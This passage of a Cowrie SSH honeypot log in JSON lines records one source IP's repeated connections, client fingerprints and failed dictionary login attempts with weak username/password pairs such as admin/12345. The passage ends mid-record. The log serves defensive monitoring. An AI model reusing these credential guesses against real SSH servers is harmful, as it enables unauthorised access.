{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:01:44.092566Z","src_ip":"212.227.235.229","session":"c20d62e693c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":24992,"dst_ip":"1.2.3.4","dst_port":22,"session":"19ccb04c8ff9","protocol":"ssh","message":"New connection: 212.227.235.229:24992 (1.2.3.4:22) [session: 19ccb04c8ff9]","sensor":"my-vps","timestamp":"2025-08-28T08:01:44.212254Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T08:01:44.213250Z","src_ip":"212.227.235.229","session":"19ccb04c8ff9"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T08:01:44.320160Z","src_ip":"212.227.235.229","session":"19ccb04c8ff9"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:01:44.341730Z","src_ip":"212.227.235.229","session":"c20d62e693c4"}
{"eventid":"cowrie.login.failed","username":"admin","password":"badbad","message":"login attempt [admin/badbad] failed","sensor":"my-vps","timestamp":"2025-08-28T08:01:44.832324Z","src_ip":"212.227.235.229","session":"19ccb04c8ff9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"arrakis","message":"login attempt [admin/arrakis] failed","sensor":"my-vps","timestamp":"2025-08-28T08:01:45.943350Z","src_ip":"212.227.235.229","session":"19ccb04c8ff9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345","message":"login attempt [admin/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T08:01:46.572405Z","src_ip":"212.227.235.229","session":"c20d62e693c4"}
{"eventid":"cowrie.login.failed","username":"admin","password":"armstrong","message":"login attempt [admin/armstrong] failed","sensor":"my-vps","timestamp":"2025-08-28T08:01:47.051909Z","src_ip":"212.227.235.229","session":"19ccb04c8ff9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"arman","message":"login attempt [admin/arman] failed","sensor":"my-vps","timestamp":"2025-08-28T08:01:48.161171Z","src_ip":"212.227.235.229","session":"19ccb04c8ff9"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:01:48.597149Z","src_ip":"212.227.235.229","session":"c20d62e693c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56908,"dst_ip":"1.2.3.4","dst_port":22,"session":"68e723c48fb0","protocol":"ssh","message":"New connection: 212.227.235.229:56908 (1.2.3.4:22) [session: 68e723c48fb0]","sensor":"my-vps","timestamp":"2025-08-28T08:01:48.760965Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:01:48.762262Z","src_ip":"212.227.235.229","session":"68e723c48fb0"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:01:49.009870Z","src_ip":"212.227.235.229","session":"68e723c48fb0"}
{"eventid":"cowrie.login.failed","username":"admin","password":"arielle","message":"login attempt [admin/arielle] failed","sensor":"my-vps","timestamp":"2025-08-28T08:01:49.271088Z","src_ip":"212.227.235.229","session":"19ccb04c8ff9"}
{"eventid":"cowrie.login.failed","username":"rebecca","password":"rebecca","message":"login attempt [rebecca/rebecca] failed","sensor":"my-vps","timestamp":"2025-08-28T08:01:49.778777Z","src_ip":"212.227.235.229","session":"68e723c48fb0"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:01:50.380458Z","src_ip":"212.227.235.229","session":"19ccb04c8ff9"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:01:51.037151Z","src_ip":"212.227.235.229","session":"68e723c48fb0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58360,"dst_ip":"1.2.3.4","dst_port":22,"session":"77053905c1e7","protocol":"ssh","message":"New connection: 212.227.235.229:58360 (1.2.3.4:22) [session: 77053905c1e7]","sensor":"my-vps","timestamp":"2025-08-28T08:02:05.218396Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:02:05.352870Z","src_ip":"212.227.235.229","session":"77053905c1e7"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:02:05.550932Z","src_ip":"212.227.235.229","session":"77053905c1e7"}
{"eventid":"cowrie.login.failed","username":"guest1","password":"guest1","message":"login attempt [guest1/guest1] failed","sensor":"my-vps","timestamp":"2025-08-28T08:02:06.912486Z","src_ip":"212.227.235.229","session":"77053905c1e7"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:02:08.402477Z","src_ip":"212.227.235.229","session":"77053905c1e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54296,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f2f080aca26","protocol":"ssh","message":"New connection: 212.227.235.229:54296 (1.2.3.4:22) [session: 5f2f080aca26]","sensor":"my-vps","timestamp":"2025-08-28T08:02:11.261886Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:02:11.374581Z","src_ip":"212.227.235.229","session":"5f2f080aca26"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:02:11.585025Z","src_ip":"212.227.235.229","session":"5f2f080aca26"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54316,"dst_ip":"1.2.3.4","dst_port":22,"session":"877e9ecef19b","protocol":"ssh","message":"New connection: 212.227.235.229:54316 (1.2.3.4:22) [session: 877e9ecef19b]","sensor":"my-vps","timestamp":"2025-08-28T08:02:15.482998Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:02:16.226827Z","src_ip":"212.227.235.229","session":"877e9ecef19b"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:02:16.339971Z","src_ip":"212.227.235.229","session":"877e9ecef19b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57778,"dst_ip":"1.2.3.4","dst_port":22,"session":"c259b467aef1","protocol":"ssh","message":"New connection: 212.227.235.229:57778 (1.2.3.4:22) [session: c259b467aef1]","sensor":"my-vps","timestamp":"2025-08-28T08:02:17.306138Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:02:17.396411Z","src_ip":"212.227.235.229","session":"c259b467aef1"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.